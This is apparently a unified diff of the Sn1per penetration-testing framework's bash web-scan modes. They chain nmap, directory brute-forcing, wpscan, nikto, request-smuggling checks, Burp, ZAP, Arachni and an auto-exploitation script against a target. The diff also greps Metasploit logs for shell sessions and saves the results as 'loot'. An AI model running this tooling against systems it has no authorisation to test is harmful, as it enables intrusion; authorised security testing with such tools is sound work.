||||
for a in {1..30};
|
||||
do
|
||||
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
|
||||
done
|
||||
echo "[-] Done!"
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
if [[ "$ZAP_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "[i] Scanning: http://$TARGET:$PORT/"
|
||||
sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET:$PORT/"
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html
|
||||
cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null
|
||||
echo "[i] Scan complete."
|
||||
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html"
|
||||
fi
|
||||
|
||||
if [[ "$ARACHNI_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
|
||||
|
||||
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
|
||||
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
unzip arachni.zip
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -340,37 +410,38 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
source $file
|
||||
done
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
cd $INSTALL_DIR
|
||||
FULLNMAPSCAN="1"
|
||||
source $INSTALL_DIR/modes/fullportscan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $LOOT_DIR/scans/running_$TARGET_$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
|
||||
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then
|
||||
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#SHELLED} -ge 5 ]]; then
|
||||
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
fi
|
||||
|
||||
exit
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
cd $INSTALL_DIR
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
|
||||
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then
|
||||
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#SHELLED} -ge 5 ]]; then
|
||||
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
|
|
@ -18,9 +18,10 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
|
|
@ -73,8 +74,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap $NMAP_OPTIONS -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-https-$TARGET.xml
|
||||
port_https=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-https-$TARGET.xml | grep open`
|
||||
port_https=$PORT
|
||||
if [[ -z "$port_https" ]];
|
||||
then
|
||||
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
|
||||
|
|
@ -110,7 +110,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wafw00f https://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-https-port$PORT.txt 2> /dev/null
|
||||
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https-port443.txt 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [[ "$WHATWEB" == "1" ]]; then
|
||||
|
|
@ -215,10 +215,15 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -238,7 +243,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-common.txt -fw -r
|
||||
|
|
@ -249,7 +254,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-full.txt -fw -r
|
||||
|
|
@ -260,7 +265,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-exploits.txt -fw -r
|
||||
|
|
@ -272,7 +277,11 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -299,9 +308,16 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
|
||||
if [[ "$WP_API_KEY" ]]; then
|
||||
wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks --api-key $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks --api-key $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.txt
|
||||
echo ""
|
||||
else
|
||||
wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.txt
|
||||
fi
|
||||
fi
|
||||
if [[ "$NIKTO" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -330,59 +346,107 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py -u https://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
if [[ "$BURP_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}"
|
||||
echo ""
|
||||
for a in {1..30};
|
||||
do
|
||||
echo -n "[-] SCAN #$a: "
|
||||
curl -sI "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep HTTP | awk '{print $2}'
|
||||
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
|
||||
while [[ ${#BURP_STATUS} -gt "5" ]];
|
||||
do
|
||||
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
|
||||
BURP_STATUS_FULL=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3)
|
||||
echo "[i] STATUS: $BURP_STATUS_FULL"
|
||||
sleep 15
|
||||
done
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
done
|
||||
echo "[+] VULNERABILITIES: "
|
||||
echo "----------------------------------------------------------------"
|
||||
for a in {1..30};
|
||||
do
|
||||
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
|
||||
done
|
||||
echo "[-] Done!"
|
||||
fi
|
||||
if [[ "$ZAP_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "[i] Scanning: https://$TARGET:$PORT/"
|
||||
sudo python3 /usr/share/sniper/bin/zap-scan.py "https://$TARGET:$PORT/"
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html
|
||||
cp -f $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-https.html 2> /dev/null
|
||||
echo "[i] Scan complete."
|
||||
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html"
|
||||
fi
|
||||
if [[ "$ARACHNI_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
|
||||
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
unzip arachni.zip
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
